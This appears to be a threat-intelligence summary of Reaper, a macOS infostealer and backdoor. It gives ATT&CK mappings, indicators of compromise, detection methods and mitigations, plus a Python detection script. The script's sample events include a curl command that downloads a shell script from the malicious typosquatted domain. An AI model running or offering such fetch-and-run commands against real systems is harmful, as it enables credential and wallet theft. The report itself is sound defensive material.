*While also spoofing all the trusted domains (Apple, Microsoft, and Google) in the same attack*

# Analysis Summary
This summary is based on the technical analysis provided in the article regarding the evolution of the SHub stealer into the variant known as **Reaper**.
# Tool/Technique: Reaper (SHub Stealer Variant)
## Overview
Reaper is a sophisticated macOS infostealer and backdoor that evolved from the SHub malware family. It employs social engineering via typosquatted domains and exploits Apple’s Script Editor to bypass security enhancements introduced in macOS Tahoe. Its primary purpose is the theft of credentials, cryptocurrency, and sensitive business documents, while maintaining long-term access via a persistent backdoor.
## Technical Details
- **Type:** Malware Family (Infostealer / Backdoor)
- **Platform:** macOS
- **Capabilities:** Credential harvesting, cryptocurrency wallet injection, file exfiltration, and remote code execution (RCE).
- **First Seen:** Reported May 2026 (SentinelOne research).
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566.002 - Phishing: Spearphishing Link] (Typosquatted domains such as `mlcrosoft[.]co[.]com`)
- **[TA0002 - Execution]**
  - [T1059.002 - Command and Scripting Interpreter: AppleScript]
- **[TA0003 - Persistence]**
  - [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder] (LaunchAgents)
- **[TA0005 - Defense Evasion]**
  - [T1027 - Obfuscated Files or Information] (ASCII padding in Script Editor)
  - [T1036.004 - Masquerading: Masquerade Task or Service] (Spoofing Google Software Update)
- **[TA0009 - Collection]**
  - [T1539 - Steal Web Session Cookie]
  - [T1555 - Credentials from Password Stores]
- **[TA0011 - Command and Control]**
  - [T1105 - Ingress Tool Transfer] (curl-based payloads)
## Functionality
### Core Capabilities
- **Browser/System Theft:** Scrapes browser data, macOS Keychain, iCloud account data, and Telegram session information.
- **Credential Phishing:** Tricks users into entering login credentials via a fake "XProtectRemediator" security update popup.
- **Crypto-Theft:** Targets MetaMask and Phantom browser extensions; searches for desktop wallets like Exodus, Atomic, Ledger, and Trezor.
### Advanced Features
- **Wallet Injection:** Injects malware directly into detected cryptocurrency wallet applications to ensure ongoing theft.
- **File Grabber:** Specifically targets the Desktop and Documents folders for financial and business-related files.
- **Persistent Backdoor:** Establishes a heartbeat to a C2 server every 60 seconds, allowing for arbitrary remote code execution (RCE) with user privileges.
- **Anti-Analysis/Evasion:** Uses JavaScript-based fingerprinting to detect VMs/VPNs and employs geofencing (terminates if the victim is located in Russia).
## Indicators of Compromise
*Note: Indicators have been defanged.*
- **File Names:** `GoogleUpdate`, `XProtectRemediator` (Spoofed)
- **Path Indicators:** `~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/`
- **Network Indicators:**
  - `mlcrosoft[.]co[.]com` (Initial landing page)
  - `/api/bot/heartbeat` (C2 endpoint)
- **Behavioral Indicators:**
  - High frequency of AppleScript execution via `Script Editor.app`.
  - Unexpected `curl` commands initiated by AppleScripts.
  - Persistent LaunchAgents mimicking legitimate software (Google/Apple).
## Associated Threat Actors
- **SHub Operators:** This is a direct evolution of the SHub/ClickFix malware campaigns.
## Detection Methods
- **Signature-based detection:** Monitoring for the specific directory structure used for the fake Google Update.
- **Behavioral detection:** Flagging `Script Editor` when it attempts to call `curl` to download shell scripts from external domains.
- **YARA:** Detection of the specific ASCII padding patterns used within `.scpt` or AppleScript files to hide payloads.
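The signature-based and behavioral detections above, and the network indicators from the IoC section, as an added example that is not part of the original report or of any vendor's product: a small classifier run over constructed macOS process events. The event field names (`parent`, `path`, `cmdline`) are assumed; map them to whatever your EDR or unified-log export actually emits.

```python
"""Flag the Reaper behaviours listed in the report over constructed process events.
Added example; event schema and sample telemetry are assumptions, not real data."""
import re
from urllib.parse import urlparse

# Indicators taken from the report (defanged domain is refanged for matching)
FAKE_UPDATE_PATH = "/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/"
C2_DOMAIN = "mlcrosoft[.]co[.]com".replace("[.]", ".")
C2_ENDPOINT = "/api/bot/heartbeat"
SCRIPT_EDITOR = "Script Editor"


def curl_target(cmdline: str):
    """Return the first http(s) URL in a curl command line, or None."""
    m = re.search(r"curl\b.*?(https?://\S+)", cmdline)
    return m.group(1) if m else None


def classify(event: dict) -> list:
    """Return the report indicators matched by one process event (assumed schema)."""
    hits = []
    parent, path, cmd = event.get("parent", ""), event.get("path", ""), event.get("cmdline", "")
    url = curl_target(cmd)
    if url:
        u = urlparse(url)
        # Behavioral detection: Script Editor spawning curl to an external host
        if SCRIPT_EDITOR in parent:
            hits.append("script-editor-curl")
        # Network indicators: known landing domain or C2 heartbeat endpoint
        if u.hostname == C2_DOMAIN or u.path == C2_ENDPOINT:
            hits.append("known-c2")
    # Signature-based detection: the fake Google Update directory structure
    if FAKE_UPDATE_PATH in path or FAKE_UPDATE_PATH in cmd:
        hits.append("fake-googleupdate-path")
    return hits


def scan(events: list) -> list:
    """Return (index, hits) for every event that matched at least one indicator."""
    results = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, h) for i, h in results if h]


# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    {"parent": "Script Editor", "path": "/usr/bin/curl",
     "cmdline": "curl -s https://mlcrosoft.co.com/install.sh"},
    {"parent": "launchd", "cmdline": "GoogleUpdate",
     "path": "/Users/x/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"},
    {"parent": "Terminal", "path": "/usr/bin/curl",
     "cmdline": "curl -s https://example.org/index.html"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```

The `script-editor-curl` rule fires on any curl spawned by Script Editor; tune it against your own baseline before alerting, since the report's point is that such a spawn is unexpected, not impossible.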
## Mitigation Strategies
- **User Education:** Train users to recognize typosquatted domains and to be wary of scripts that open automatically in Script Editor.
- **System Hardening:** Use Mobile Device Management (MDM) to restrict the execution of unsigned AppleScripts.
- **Access Control:** Implement strict outgoing network filtering (Egress filtering) to block unauthorized connections to unknown C2 endpoints.
## Related Tools/Techniques
- **AMOS (Atomic macOS Stealer):** Shares similar document-theft and crypto-targeting logic.
- **ClickFix:** The precursor campaign style that uses social engineering to trick users into running terminal or script commands.